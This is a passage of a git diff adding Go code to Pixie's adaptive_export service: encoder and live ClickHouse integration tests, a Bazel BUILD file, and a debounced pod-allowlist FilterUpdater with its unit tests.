+	// pixieTS, so a change to the encoder's time layout ("YYYY-MM-DD
+	// HH:MM:SS.NNNNNNNNN", UTC, nine fractional digits) fails this test
+	// as well.
+	const want = "2024-06-07 19:53:41.560000000"
+	if got != want {
+		t.Fatalf("event_time = %q, want %q (must equal time_ verbatim, not epoch 0)", got, want)
+	}
+}
+
+// TestFastEncode_EventTime_NotOverwritten checks that an event_time the
+// caller already supplied wins: the derivation from time_ applies only
+// when the key is absent. The row is given two different instants, and
+// the encoded event_time must carry the caller's date (2023-11-14), not
+// the one from time_.
+//
+// The row count and the string type of event_time are checked before
+// use, so a broken encoder fails with a message instead of panicking
+// on an index or type assertion.
+func TestFastEncode_EventTime_NotOverwritten(t *testing.T) {
+	rowTS := time.Unix(0, 1_717_790_000_000_000_000).UTC()
+	differentTS := time.Unix(0, 1_700_000_000_000_000_000).UTC()
+	row := sampleHTTPRow(0)
+	row["time_"] = rowTS
+	row["event_time"] = differentTS // caller supplied; must be preserved
+
+	var buf bytes.Buffer
+	if err := encodePixieRowsFast(&buf, "http_events", []map[string]any{row}); err != nil {
+		t.Fatal(err)
+	}
+	parsed := parseNDJSON(buf.Bytes())
+	if len(parsed) != 1 {
+		t.Fatalf("expected 1 row, got %d", len(parsed))
+	}
+	et, ok := parsed[0]["event_time"].(string)
+	if !ok {
+		t.Fatalf("event_time absent from encoded row: %v", parsed[0])
+	}
+	if !strings.HasPrefix(et, "2023-11-14") {
+		t.Fatalf("caller-supplied event_time was overwritten: got %q", et)
+	}
+}
+
+// TestFastEncode_StringEscapesMatch checks that string escaping in the
+// fast encoder decodes to the same values as encoding/json's. The
+// sample strings cover tab, newline, double quote, backslash, a control
+// byte, and multi-byte UTF-8 (snowman, rocket, ÿ). A mismatch would
+// mean ClickHouse stores different bytes depending on which path
+// encoded the row.
+func TestFastEncode_StringEscapesMatch(t *testing.T) {
+	row := sampleHTTPRow(0)
+	row["req_path"] = "/a/ÿ/utf8"
+	row["req_body"] = "tab\there\nnewline \"quoted\" back\\slash \x01ctl ☃ emoji 🚀"
+	rows := []map[string]any{row}
+
+	var fastOut bytes.Buffer
+	if err := encodePixieRowsFast(&fastOut, "http_events", rows); err != nil {
+		t.Fatal(err)
+	}
+
+	gotFast := parseNDJSON(fastOut.Bytes())
+	gotSlow := parseNDJSON(encodeViaJSON(rows))
+	if !reflect.DeepEqual(gotFast, gotSlow) {
+		t.Fatalf("escape divergence:\n fast=%v\n slow=%v", gotFast, gotSlow)
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/integration_test.go b/src/vizier/services/adaptive_export/internal/sink/integration_test.go
new file mode 100644
index 00000000000..343510d991f
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/integration_test.go
@@ -0,0 +1,218 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+//go:build integration
+// +build integration
+
+package sink_test
+
+import (
+ "context"
+ "crypto/sha256"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "os"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+)
+
+// Live integration tests for the operator's ClickHouse write path.
+// Driven against a real ClickHouse reachable at INTEGRATION_CH_ENDPOINT.
+// Skipped if unset.
+
+// env reads the live-ClickHouse settings from the environment:
+// INTEGRATION_CH_ENDPOINT, INTEGRATION_CH_USER and
+// INTEGRATION_CH_PASSWORD. When the endpoint is unset or empty the
+// calling test is skipped; user and password may be empty.
+func env(t *testing.T) (endpoint, user, pass string) {
+	t.Helper()
+	if endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT"); endpoint == "" {
+		t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test")
+	}
+	user = os.Getenv("INTEGRATION_CH_USER")
+	pass = os.Getenv("INTEGRATION_CH_PASSWORD")
+	return endpoint, user, pass
+}
+
+// ensureSchema applies the operator's ClickHouse schema to the target
+// server through a chpkg Applier before a live test runs, allowing up
+// to 60 seconds. Any failure is a failed precondition and aborts the
+// calling test.
+func ensureSchema(t *testing.T, endpoint, user, pass string) {
+	t.Helper()
+	applier, err := chpkg.NewApplier(endpoint, user, pass)
+	if err != nil {
+		t.Fatalf("NewApplier: %v", err)
+	}
+
+	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+	defer cancel()
+	err = applier.Apply(ctx)
+	if err != nil {
+		t.Fatalf("Apply (precondition): %v", err)
+	}
+}
+
+// chCount runs query against ClickHouse's HTTP interface at endpoint
+// and returns the integer at the start of the response body. It is
+// meant for single-value queries such as SELECT count(). Basic auth is
+// sent only when user is non-empty, the request times out after 10
+// seconds, and at most 4 KiB of the response is read.
+//
+// Every failure aborts the calling test: a request that cannot be
+// built or sent, an unreadable body, a non-2xx status, or a body that
+// does not start with an integer. A response that cannot be parsed is
+// never reported as a count of 0.
+func chCount(t *testing.T, endpoint, user, pass, query string) int {
+	t.Helper()
+	q := url.Values{}
+	q.Set("query", query)
+	req, err := http.NewRequest(http.MethodGet, strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), nil)
+	if err != nil {
+		t.Fatalf("count: build request: %v", err)
+	}
+	if user != "" {
+		req.SetBasicAuth(user, pass)
+	}
+	resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req)
+	if err != nil {
+		t.Fatalf("count: %v", err)
+	}
+	defer resp.Body.Close()
+	body, err := io.ReadAll(io.LimitReader(resp.Body, 4096))
+	if err != nil {
+		t.Fatalf("count: read response: %v", err)
+	}
+	text := strings.TrimSpace(string(body))
+	if resp.StatusCode/100 != 2 {
+		t.Fatalf("count HTTP %d: %s", resp.StatusCode, text)
+	}
+	var n int
+	if _, err := fmt.Sscanf(text, "%d", &n); err != nil {
+		t.Fatalf("count: response %q is not an integer: %v", text, err)
+	}
+	return n
+}
+
+// TestSinkWriteAttribution_Live writes one AttributionRow through
+// sink.Write against a live ClickHouse and checks that exactly one row
+// with this run's hostname is then present in
+// forensic_db.adaptive_attribution. The hostname, and the anomaly hash
+// derived from it, embed the current UnixNano, so rows left behind by
+// earlier runs cannot affect the count. Skipped unless
+// INTEGRATION_CH_ENDPOINT is set.
+//
+// Per the original note, Write is the operator's only production write
+// surface, one row is written per arriving anomaly, and the table is a
+// ReplacingMergeTree(t_end) that collapses re-inserts — none of that
+// is visible from this file.
+func TestSinkWriteAttribution_Live(t *testing.T) {
+	endpoint, user, pass := env(t)
+	ensureSchema(t, endpoint, user, pass)
+
+	cfg := sink.Config{
+		Endpoint: endpoint,
+		Username: user,
+		Password: pass,
+	}
+	s, err := sink.New(cfg)
+	if err != nil {
+		t.Fatalf("sink.New: %v", err)
+	}
+
+	// Unique per run: the tag doubles as hostname and as hash seed.
+	runTag := fmt.Sprintf("aw-test-%d", time.Now().UnixNano())
+	digest := sha256.Sum256([]byte(runTag))
+
+	now := time.Now().UTC()
+	rows := []sink.AttributionRow{{
+		AnomalyHash: anomaly.AnomalyHash(fmt.Sprintf("%x", digest[:8])),
+		Namespace:   "redis",
+		Pod:         "redis-test",
+		Comm:        "redis-server",
+		PID:         1234,
+		Hostname:    runTag, // unique hostname → unique row
+		TStart:      now.Add(-5 * time.Minute),
+		TEnd:        now.Add(5 * time.Minute),
+		LastSeen:    now,
+		LastRuleID:  "R1005",
+		NAnomalies:  1,
+	}}
+
+	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancel()
+	if err := s.Write(ctx, rows); err != nil {
+		t.Fatalf("Write: %v", err)
+	}
+
+	query := fmt.Sprintf("SELECT count() FROM forensic_db.adaptive_attribution WHERE hostname='%s'", runTag)
+	if got := chCount(t, endpoint, user, pass, query); got != 1 {
+		t.Errorf("adaptive_attribution count for hostname=%s: got %d, want 1", runTag, got)
+	}
+}
+
+// TestSinkWritePixieRows_Live writes one minimal row to every table in
+// chpkg.PixieTables() through WritePixieRows against a live ClickHouse,
+// then counts the rows carrying this run's hostname and expects at
+// least one per table. A failed write or a missing row is reported per
+// table and the loop moves on, so one run lists every broken table.
+// The hostname embeds the current UnixNano, so repeated runs do not
+// need a clean cluster. Skipped unless INTEGRATION_CH_ENDPOINT is set.
+//
+// Per the original note this is the bug surface users reported: a
+// silent INSERT failure here means the per-table fan-out writes
+// nothing and the analyst sees empty tables.
+func TestSinkWritePixieRows_Live(t *testing.T) {
+	endpoint, user, pass := env(t)
+	ensureSchema(t, endpoint, user, pass)
+
+	cfg := sink.Config{
+		Endpoint: endpoint,
+		Username: user,
+		Password: pass,
+	}
+	s, err := sink.New(cfg)
+	if err != nil {
+		t.Fatalf("sink.New: %v", err)
+	}
+
+	runTag := fmt.Sprintf("aw-pix-%d", time.Now().UnixNano())
+	now := time.Now().UTC()
+	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+	defer cancel()
+
+	for _, table := range chpkg.PixieTables() {
+		rows := []map[string]any{minimalRowFor(table, runTag, now)}
+		if err := s.WritePixieRows(ctx, table, rows); err != nil {
+			t.Errorf("WritePixieRows(%s): %v", table, err)
+			continue
+		}
+
+		// Dotted table names have to be back-quoted in the query.
+		quoted := table
+		if strings.Contains(table, ".") {
+			quoted = "`" + table + "`"
+		}
+		query := fmt.Sprintf("SELECT count() FROM forensic_db.%s WHERE hostname='%s'", quoted, runTag)
+		if got := chCount(t, endpoint, user, pass, query); got < 1 {
+			t.Errorf("table %s after WritePixieRows: count=%d, want >=1", table, got)
+		}
+	}
+}
+
+// minimalRowFor builds a small row map for the given pixie table.
+// Every table gets time_ (nanosecond layout), event_time (millisecond
+// layout), upid, hostname, namespace and pod; known tables then get a
+// few extra integer columns — ports and/or latency, plus resp_status
+// for http_events. Unknown tables get only the six common keys. t is
+// formatted as given, without conversion to UTC.
+//
+// NOTE(review): per the original comment the extras are exactly the
+// columns the schema marks NOT NULL without a DEFAULT, and ClickHouse
+// fills everything else with defaults — the schema is not visible
+// here, so confirm against schema.sql.
+func minimalRowFor(table, hostname string, t time.Time) map[string]any {
+	row := map[string]any{
+		"time_":      t.Format("2006-01-02 15:04:05.000000000"),
+		"upid":       "0:0:0",
+		"hostname":   hostname,
+		"event_time": t.Format("2006-01-02 15:04:05.000"),
+		"namespace":  "default",
+		"pod":        "test-pod",
+	}
+	withPorts := func(remote int) {
+		row["remote_port"] = remote
+		row["local_port"] = 0
+	}
+
+	switch table {
+	case "http_events":
+		row["resp_status"] = 200
+		row["latency"] = 0
+		withPorts(0)
+	case "dns_events":
+		row["latency"] = 0
+		withPorts(53)
+	case "redis_events", "mysql_events", "pgsql_events", "cql_events", "mongodb_events",
+		"amqp_events", "mux_events", "tls_events", "kafka_events.beta":
+		row["latency"] = 0
+		withPorts(0)
+	case "http2_messages.beta":
+		// No latency key for this table in the original either.
+		withPorts(0)
+	}
+	return row
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel b/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel
new file mode 100644
index 00000000000..94823988493
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel
@@ -0,0 +1,44 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "streaming",
+ srcs = [
+ "filter.go",  # FilterUpdater: ActiveSet deltas -> debounced Filter snapshots
+ "notifier.go",  # AttributionNotifier: non-blocking queue in front of the ActiveSet
+ "scanner.go",
+ "supervisor.go",
+ "writer.go",
+ ],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/streaming",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],  # adaptive_export tree only
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/activeset",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
+ "@com_github_sirupsen_logrus//:logrus",
+ ],
+)
+
+pl_go_test(
+ name = "streaming_test",
+ srcs = [
+ "filter_test.go",
+ "integration_test.go",  # in-process pipeline test against a fake querier and a fake sink
+ "notifier_test.go",
+ "scanner_test.go",
+ ],
+ embed = [":streaming"],  # the test files declare `package streaming`
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/activeset",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/streaming/filter.go b/src/vizier/services/adaptive_export/internal/streaming/filter.go
new file mode 100644
index 00000000000..195fccf30cc
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/filter.go
@@ -0,0 +1,258 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package streaming implements the rev-3 push-flow: long-running
+// PxL submissions per pixie table, with a pod allowlist derived from
+// the ActiveSet. See .local/adaptive-write-rev3-plan.md for the full
+// architectural rationale.
+package streaming
+
+import (
+ "context"
+ "sync"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+// FilterMode says whether a Filter carries an explicit pod allowlist.
+type FilterMode int
+
+const (
+	// FilterModeAllowlist: the PxL script embeds the pod list in a
+	// `df = df[df.pod.in_([...])]` clause. Preferred while the set
+	// is small.
+	FilterModeAllowlist FilterMode = iota
+
+	// FilterModeUnfiltered: the script carries no pod filter, so the
+	// stream returns ALL pods on this node. Chosen once the active
+	// set exceeds MaxAllowlistSize, where PxL script size and parse
+	// cost would dominate; rows are then expected to be filtered
+	// downstream in the operator's CH writer, in memory, instead of
+	// paying a parse cost that is linear in the number of pods.
+	FilterModeUnfiltered
+)
+
+// String returns the lowercase mode name used in log output; any
+// value outside the declared constants yields "unknown".
+func (m FilterMode) String() string {
+	if m == FilterModeAllowlist {
+		return "allowlist"
+	}
+	if m == FilterModeUnfiltered {
+		return "unfiltered"
+	}
+	return "unknown"
+}
+
+// Filter is one ActiveSet snapshot handed to subscribers. Treat it as
+// read-only: broadcast sends the same value (and Pods slice) to all.
+type Filter struct {
+ Mode FilterMode // allowlist or unfiltered; see FilterMode
+ Pods []activeset.Key // set only when Mode == FilterModeAllowlist (may be empty)
+ Version uint64 // ActiveSet version this filter was derived from
+}
+
+// UpdaterConfig holds the FilterUpdater tunables; zero values pick defaults.
+type UpdaterConfig struct {
+	// Debounce is the window over which ActiveSet deltas are coalesced
+	// into a single filter emission, capping re-submission at one per
+	// window per TableScanner. Values <= 0 select 1 second.
+	Debounce time.Duration
+
+	// MaxAllowlistSize is the pod count above which the updater emits
+	// FilterModeUnfiltered. 0 selects 500; a negative value disables
+	// the cap (allowlist always; PxL parse cost is yours to own).
+	MaxAllowlistSize int
+
+	// SubscribeBuffer is the per-subscriber delta buffer size requested
+	// from the underlying ActiveSet subscription. Values <= 0 select 32.
+	SubscribeBuffer int
+}
+
+// defaulted returns a copy of c with unset fields replaced by defaults.
+func (c UpdaterConfig) defaulted() UpdaterConfig {
+	if c.SubscribeBuffer < 1 {
+		c.SubscribeBuffer = 32
+	}
+	if c.MaxAllowlistSize == 0 {
+		c.MaxAllowlistSize = 500
+	}
+	if c.Debounce < 1 {
+		c.Debounce = time.Second
+	}
+	return c
+}
+
+// FilterUpdater bridges ActiveSet → TableScanner: it listens for
+// ActiveSet deltas, debounces them, and fans one coalesced Filter
+// out to every subscriber channel. Run() owns one goroutine.
+type FilterUpdater struct {
+	set *activeset.ActiveSet
+	cfg UpdaterConfig // defaults already applied by NewUpdater
+
+	// deltaCh is the ActiveSet subscription. It is opened in
+	// NewUpdater, not in Run, so that every Upsert made after
+	// NewUpdater returns is guaranteed to be delivered. Were it
+	// opened inside Run's goroutine instead, an Upsert landing
+	// before that goroutine had subscribed would be silently
+	// dropped.
+	deltaCh <-chan activeset.Delta
+
+	mu     sync.Mutex    // guards subs and closed
+	subs   []chan Filter // one buffered channel per Subscribe call
+	closed bool          // set by closeSubs
+}
+
+// NewUpdater builds a FilterUpdater over set, applying defaults to
+// cfg, and opens the ActiveSet subscription right away using the
+// configured SubscribeBuffer. Deltas queue on that subscription
+// until the caller starts Run(ctx), which is what consumes them;
+// run it in its own goroutine.
+func NewUpdater(set *activeset.ActiveSet, cfg UpdaterConfig) *FilterUpdater {
+	u := &FilterUpdater{set: set, cfg: cfg.defaulted()}
+	u.deltaCh = set.Subscribe(u.cfg.SubscribeBuffer)
+	return u
+}
+
+// Subscribe returns a buffered channel that first carries a Filter
+// for the current ActiveSet snapshot (so the first PxL submission
+// need not wait for a delta) and then one fresh Filter per debounce
+// window in which deltas landed. The channel is closed when Run
+// exits; subscribing after that returns an already-closed channel.
+func (u *FilterUpdater) Subscribe() <-chan Filter {
+	u.mu.Lock()
+	defer u.mu.Unlock()
+	ch := make(chan Filter, 4)
+	if u.closed {
+		// closeSubs already ran, so nobody would ever close ch later.
+		close(ch)
+		return ch
+	}
+	ch <- u.computeFilter() // seed; cannot block, the buffer is empty
+	u.subs = append(u.subs, ch)
+	return ch
+}
+
+// Run owns the FilterUpdater goroutine until ctx is cancelled or the
+// delta channel is closed. On return it unsubscribes from the
+// ActiveSet and then closes every subscriber channel.
+//
+// Lifecycle (deltaCh was already subscribed by NewUpdater):
+//
+//	for {
+//		select {
+//		case <-ctx.Done(): close subs; return
+//		case <-deltaCh:    arm a fire Debounce from now, unless one is pending
+//		case <-fireTimer:  compute filter; broadcast to subs
+//		}
+//	}
+//
+// The timer is armed only by a delta; with no deltas Run is dormant.
+func (u *FilterUpdater) Run(ctx context.Context) {
+ defer u.closeSubs() // deferred first, so it runs last
+ defer u.set.Unsubscribe(u.deltaCh) // runs before closeSubs (LIFO)
+
+ var pendingTimer *time.Timer
+ var pendingC <-chan time.Time // nil while disarmed; a nil channel never fires in select
+ arm := func() {
+ if pendingTimer != nil {
+ return // already scheduled: the first delta of a burst fixes the fire time
+ }
+ pendingTimer = time.NewTimer(u.cfg.Debounce)
+ pendingC = pendingTimer.C
+ }
+ disarm := func() {
+ if pendingTimer != nil {
+ pendingTimer.Stop()
+ pendingTimer = nil
+ pendingC = nil
+ }
+ }
+
+ for {
+ select {
+ case <-ctx.Done():
+ disarm()
+ return
+
+ case _, ok := <-u.deltaCh:
+ if !ok {
+ // Delta channel was closed: stop any pending timer and
+ // exit without emitting; the deferred calls then close the
+ // subscriber channels (CodeRabbit r3379377645).
+ disarm()
+ return
+ }
+ arm()
+
+ case <-pendingC:
+ disarm()
+ f := u.computeFilter()
+ u.broadcast(f)
+ log.WithFields(log.Fields{
+ "mode": f.Mode,
+ "pods": len(f.Pods),
+ "version": f.Version,
+ }).Info("streaming.FilterUpdater: emitted filter")
+ }
+ }
+}
+
+// computeFilter takes an ActiveSet snapshot and picks the mode:
+// unfiltered when a positive cap is exceeded, allowlist otherwise.
+func (u *FilterUpdater) computeFilter() Filter {
+	pods, ver := u.set.Snapshot()
+	if u.cfg.MaxAllowlistSize <= 0 || len(pods) <= u.cfg.MaxAllowlistSize {
+		return Filter{Mode: FilterModeAllowlist, Pods: pods, Version: ver}
+	}
+	return Filter{Mode: FilterModeUnfiltered, Version: ver}
+}
+
+// broadcast delivers f to every subscriber without ever blocking. When
+// a subscriber's buffer is full, the OLDEST queued filter is discarded
+// and the send is retried once, so the newest state is what they see.
+func (u *FilterUpdater) broadcast(f Filter) {
+	u.mu.Lock()
+	defer u.mu.Unlock()
+	for _, sub := range u.subs {
+		select {
+		case sub <- f:
+			continue
+		default:
+		}
+		select {
+		case <-sub:
+		default:
+		}
+		select {
+		case sub <- f:
+		default:
+		}
+	}
+}
+
+// closeSubs marks the updater closed and closes every subscriber channel.
+func (u *FilterUpdater) closeSubs() {
+	u.mu.Lock()
+	defer u.mu.Unlock()
+	for i := range u.subs {
+		close(u.subs[i])
+	}
+	u.subs, u.closed = nil, true
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/filter_test.go b/src/vizier/services/adaptive_export/internal/streaming/filter_test.go
new file mode 100644
index 00000000000..a9167261377
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/filter_test.go
@@ -0,0 +1,233 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+// TestFilterUpdater_DebouncesMultipleDeltas checks that a burst of
+// upserts inside one debounce window yields exactly one Filter.
+func TestFilterUpdater_DebouncesMultipleDeltas(t *testing.T) {
+	set := activeset.New()
+	u := NewUpdater(set, UpdaterConfig{Debounce: 50 * time.Millisecond})
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	go u.Run(ctx)
+	ch := u.Subscribe()
+	<-ch // discard the seeded (empty) snapshot
+
+	// Ten distinct pods, all upserted well within the 50ms window.
+	for i := 0; i < 10; i++ {
+		set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute))
+	}
+
+	// Collect until window + slack has passed; expect one coalesced Filter.
+	var (
+		emitted int
+		latest  Filter
+	)
+	timeout := time.After(300 * time.Millisecond)
+collect:
+	for {
+		select {
+		case latest = <-ch:
+			emitted++
+		case <-timeout:
+			break collect
+		}
+	}
+	if emitted != 1 {
+		t.Fatalf("expected 1 coalesced filter emission, got %d", emitted)
+	}
+	if len(latest.Pods) != 10 {
+		t.Fatalf("expected 10 pods in coalesced filter, got %d", len(latest.Pods))
+	}
+}
+
+// TestFilterUpdater_FallsBackToUnfilteredOnSizeCap: five active pods
+// against a cap of three must produce an unfiltered Filter.
+func TestFilterUpdater_FallsBackToUnfilteredOnSizeCap(t *testing.T) {
+	cfg := UpdaterConfig{Debounce: 20 * time.Millisecond, MaxAllowlistSize: 3}
+	set := activeset.New()
+	u := NewUpdater(set, cfg)
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	go u.Run(ctx)
+	filters := u.Subscribe()
+	<-filters // seeded snapshot of the still-empty set
+
+	for _, pod := range []string{"a", "b", "c", "d", "e"} {
+		set.Upsert(activeset.Key{Pod: pod}, time.Now().Add(time.Minute))
+	}
+	select {
+	case <-time.After(200 * time.Millisecond):
+		t.Fatalf("no filter emission")
+	case got := <-filters:
+		if got.Mode != FilterModeUnfiltered {
+			t.Fatalf("expected unfiltered mode (5 > cap 3), got %v", got.Mode)
+		}
+	}
+}
+
+// TestFilterUpdater_CapBoundary_AtLimit pins the inclusive side of the
+// cap: with exactly MaxAllowlistSize pods the updater MUST stay in
+// allowlist mode and list all of them.
+func TestFilterUpdater_CapBoundary_AtLimit(t *testing.T) {
+	const limit = 3
+	set := activeset.New()
+	u := NewUpdater(set, UpdaterConfig{Debounce: 10 * time.Millisecond, MaxAllowlistSize: limit})
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	go u.Run(ctx)
+	ch := u.Subscribe()
+	<-ch // seeded empty snapshot
+
+	for i := 0; i < limit; i++ {
+		set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute))
+	}
+	got := waitForFilter(t, ch, 300*time.Millisecond)
+	if got.Mode != FilterModeAllowlist {
+		t.Fatalf("at exactly cap=3, expected allowlist, got %v", got.Mode)
+	}
+	if n := len(got.Pods); n != limit {
+		t.Fatalf("expected 3 pods in allowlist, got %d", n)
+	}
+}
+
+// TestFilterUpdater_CapBoundary_OneOverLimit pins the exclusive side of
+// the cap: MaxAllowlistSize+1 pods MUST flip the updater to unfiltered.
+func TestFilterUpdater_CapBoundary_OneOverLimit(t *testing.T) {
+	set := activeset.New()
+	u := NewUpdater(set, UpdaterConfig{Debounce: 10 * time.Millisecond, MaxAllowlistSize: 3})
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	go u.Run(ctx)
+	ch := u.Subscribe()
+	<-ch // seeded empty snapshot
+
+	for _, pod := range []string{"a", "b", "c", "d"} {
+		set.Upsert(activeset.Key{Pod: pod}, time.Now().Add(time.Minute))
+	}
+
+	got := waitForFilter(t, ch, 300*time.Millisecond)
+	if got.Mode == FilterModeUnfiltered {
+		return
+	}
+	t.Fatalf("at cap+1=4, expected unfiltered, got %v with %d pods", got.Mode, len(got.Pods))
+}
+
+// TestFilterUpdater_CapBoundary_RecoversAfterShrink: once a burst has
+// pushed the updater into unfiltered mode, shrinking the set back
+// under the cap MUST return it to allowlist mode. Otherwise a single
+// transient burst would pin the stream to unfiltered forever.
+func TestFilterUpdater_CapBoundary_RecoversAfterShrink(t *testing.T) {
+	set := activeset.New()
+	u := NewUpdater(set, UpdaterConfig{Debounce: 10 * time.Millisecond, MaxAllowlistSize: 3})
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	go u.Run(ctx)
+	ch := u.Subscribe()
+	<-ch // seeded empty snapshot
+	podKey := func(i int) activeset.Key {
+		return activeset.Key{Pod: string(rune('a' + i))}
+	}
+
+	// Phase 1: ten pods against a cap of three.
+	for i := 0; i < 10; i++ {
+		set.Upsert(podKey(i), time.Now().Add(time.Minute))
+	}
+	latest := waitForFilter(t, ch, 300*time.Millisecond)
+	if latest.Mode != FilterModeUnfiltered {
+		t.Fatalf("expected unfiltered after burst, got %v", latest.Mode)
+	}
+
+	// Phase 2: remove pods 3..9, leaving exactly three.
+	for i := 3; i < 10; i++ {
+		set.Remove(podKey(i))
+	}
+
+	// Intermediate emissions may still be unfiltered; keep reading
+	// (100ms per wait, 500ms overall) until an allowlist shows up.
+	for stop := time.Now().Add(500 * time.Millisecond); time.Now().Before(stop); {
+		select {
+		case latest = <-ch:
+		case <-time.After(100 * time.Millisecond):
+		}
+		if latest.Mode == FilterModeAllowlist {
+			return // recovered
+		}
+	}
+	t.Fatalf("did not recover to allowlist mode after shrink; last mode=%v pods=%d",
+		latest.Mode, len(latest.Pods))
+}
+
+// TestFilterUpdater_CapDisabled_AllowsAnySize — a negative
+// MaxAllowlistSize disables the cap (0 would select the 500 default),
+// so even a large set stays in allowlist mode.
+func TestFilterUpdater_CapDisabled_AllowsAnySize(t *testing.T) {
+	set := activeset.New()
+	u := NewUpdater(set, UpdaterConfig{Debounce: 10 * time.Millisecond, MaxAllowlistSize: -1})
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	go u.Run(ctx)
+	ch := u.Subscribe()
+	<-ch // seeded empty snapshot
+	for i := 0; i < 100; i++ {
+		// First letter is i%26, second is i/26, so all 100 names differ.
+		name := string(rune('a'+i%26)) + string(rune('a'+i/26))
+		set.Upsert(activeset.Key{Pod: name}, time.Now().Add(time.Minute))
+	}
+
+	if got := waitForFilter(t, ch, 300*time.Millisecond); got.Mode != FilterModeAllowlist {
+		t.Fatalf("with cap disabled (=-1), expected allowlist; got %v", got.Mode)
+	}
+}
+
+// waitForFilter returns the next Filter from ch, failing the test on timeout.
+func waitForFilter(t *testing.T, ch <-chan Filter, timeout time.Duration) Filter {
+	t.Helper()
+	select {
+	case <-time.After(timeout):
+		t.Fatalf("no filter within %v", timeout)
+	case got := <-ch:
+		return got
+	}
+	return Filter{}
+}
+
+// TestFilterUpdater_InitialSnapshotIsSeeded: the first Filter lists pre-existing pods.
+func TestFilterUpdater_InitialSnapshotIsSeeded(t *testing.T) {
+	set := activeset.New()
+	set.Upsert(activeset.Key{Namespace: "n", Pod: "p1"}, time.Now().Add(time.Minute))
+	u := NewUpdater(set, UpdaterConfig{Debounce: 50 * time.Millisecond})
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	go u.Run(ctx)
+	select {
+	case first := <-u.Subscribe():
+		if len(first.Pods) != 1 || first.Pods[0].Pod != "p1" {
+			t.Fatalf("initial snapshot wrong: %+v", first)
+		}
+	case <-time.After(200 * time.Millisecond):
+		t.Fatalf("no initial filter")
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/integration_test.go b/src/vizier/services/adaptive_export/internal/streaming/integration_test.go
new file mode 100644
index 00000000000..40e31870a78
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/integration_test.go
@@ -0,0 +1,268 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
